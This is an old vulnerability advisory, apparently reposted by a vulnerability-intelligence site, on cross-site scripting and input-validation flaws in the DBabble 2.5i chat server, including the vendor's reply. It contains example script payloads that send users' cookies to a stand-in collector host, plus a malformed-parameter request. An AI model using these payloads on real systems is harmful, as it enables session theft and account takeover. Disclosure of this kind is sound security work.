DBabble 2.5i has XSS and cookie security issues; vendor promised a fix soon.
`*first published on: http://members.lycos.co.uk/r34ct/
---------------------------------------------------------------------------------------------
DBabble 2.5i- Instant Messaging for the office XSS/Cookie problems Advisory
----------------------------------------------------------------------------------------------------------------------
DBabble 2.5i XSS/Cookie Problem
12/09/2003
-by dr_insane ([email protected])
-http://members.lycos.co.uk/r34ct/
-------------------
Vendor Information:
-------------------
Homepage: http://www.netwinsite.com/
Vendor informed
Vender Response : None (yet?)
Here is the answer from the Vendor:
From [email protected] Tue Sep 16 00 : 39:06 2003
Return-Path : <[email protected]>
Received : from netwin.co.nz (smtp.netwin.co.nz [210.54.249.114]) by monster.phaistosnetworks.gr (8.12.9/8.12.5) with ESMTP id h8FLd2U5021801 for <[email protected]>; Tue, 16 Sep 2003 00:39:04 +0300
Received : from matt2 (unverified [10.0.0.26]) by netwin.co.nz (SurgeMail 1.5a) with ESMTP id 839253 for <[email protected]>; Tue, 16 Sep 2003 09:37:04 +1200
from : Matt Kearse <[email protected]>
X-Mailer : The Bat! (v1.63 Beta/7)
Reply-To : [email protected]
Organization : NetWin Ltd
X-Priority : 3 (Normal)
Message-ID : <[email protected]>
To : "xxxx xxxxxx" <[email protected]>
Topic : Re: DBabble 2.5i- Instant Messaging for the office XSS/Cookie problems Advisory
In-Reply-To : <[email protected]>
References : <[email protected]>
MIME-Version : 1.0
Content-type : text/plain; charset=ISO-8859-7
Content-transfer-encoding : 8bit
X-Server : High Performance Mail Server - http://surgemail.com
Hi ,
Thanks for letting us know about these problems. We should have a
fixed version available within a day or two. I will let you know when
we do.
Regards,
Matt Kearse.
-------------------
Affected Versions/systems:
-------------------
(Version 2.5i is vulnerable. Older versions may be vulnerable too)
Dbabble Solaris (Sparc)
Dbabble Linux libc6/redhat 5/6
Dbabble Free BSD
Dbabble MacOS X
Dbabble Freebsd
Dbabble AIX
Dbabble Windows NT/2000/XP/95/98/ME
NO VULNERABLE VERSIONS
- ?
-------------------
Description:
-------------------
DBabble is a chat, discussion, and instant messaging server and client, which allows users to send encrypted instant messages, have private conversations, and create and participate in private or public chat rooms and discussions. Users communicate with the chat server using either a web browser, or a client for Windows 95/98/ME/NT/2000/XP. Users can communicate with ICQ, MSN, Yahoo, and AIM (AOL) users, send instant messages to groups of users, receive email copies of their instant messages or new discussion group articles, and they can send and receive instant messaging from email addresses and mobile phones. Discussion groups/forums can optionally be linked to external usenet (NNTP) groups and/or made available to NNTP clients. A single DBabble chat server can support thousands of simultaneous online users and can optionally be isolated from outside communication.
I encountered XSS security holes in some scripts of Dbabble 2.5i and some other problems.
-----------------------------
Vulnerable Scripts/Exploit:
--------------------------------------------
(1)
http://[HOST]:8132/dbabble?cmd=[XSS ATTACK]
http://[HOST]:8132/dbabble?[XSS ATTACK]
http://[HOST]:8132/dbabble?cmd=cmd_newuser&lang=English&template=Standard (Fields name,password and Display name are vulnerable to XSS ATTACK)
Another problem is that Dbabble uses cookies. So it is possible for someone to steal them using XSS
attacks and some javascript.
Examples:
http://[HOST]/dbabble?cmd="><script>document.location='http://www.yourhost.org/cgi-bin/cookie.cgi?
'%20+document.cookie</script>
http://[HOST]/dbabble?cmd=<script>document.location='http://www.yourhost.org/cgi-bin/cookie.cgi?'
+document.cookie</script>
http://[HOST]/dbabble?cmd=><script>document.location='http://www.yourhost.org/cgi-bin/cookie.cgi?'
+document.cookie</script>
These are the examples of "evil" Javascript . These Javascript examples gather
the users cookie and then send a request to the yourhost.org website with the cookie in the
query .
When you access a hostile link with a xss attack in those scripts youur
browser will execute the script commands.
This can be use for steal cookies , authentication tokens and other
private information.
If your browser is vulnerable to other holes ( like MSIE ;-) you can
have more problems...
(2)
Another problem is that the parametre 'display' doesn't check the values it can accept. This can
lead to DOS attacks and other problems.
http:[HOST]/dbabble?tok=1_1_840327879_1094951187&cmd=u_friends_del&hid=1&uid=3&display=WHATEVER!!!!
-----------------
| SoLuTiOnS |
-----------------
Update to the next Version:>
-----------
| CONTACT |
-----------
Dr_insane
[email protected]
http://members.lycos.co.uk/r34ct/
Greece
----------------------------
Dr_Insane
members.lycos.co.uk/r34ct/
----------------------------
______________________________________________________________________________________
http://mobile.pathfinder.gr - Pathfinder Mobile logos & Ringtones!
http://www.pathfinder.gr - ΓΓΉΓ±Γ₯ΓΓ mail Ñðü ôïà Pathfinder!
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo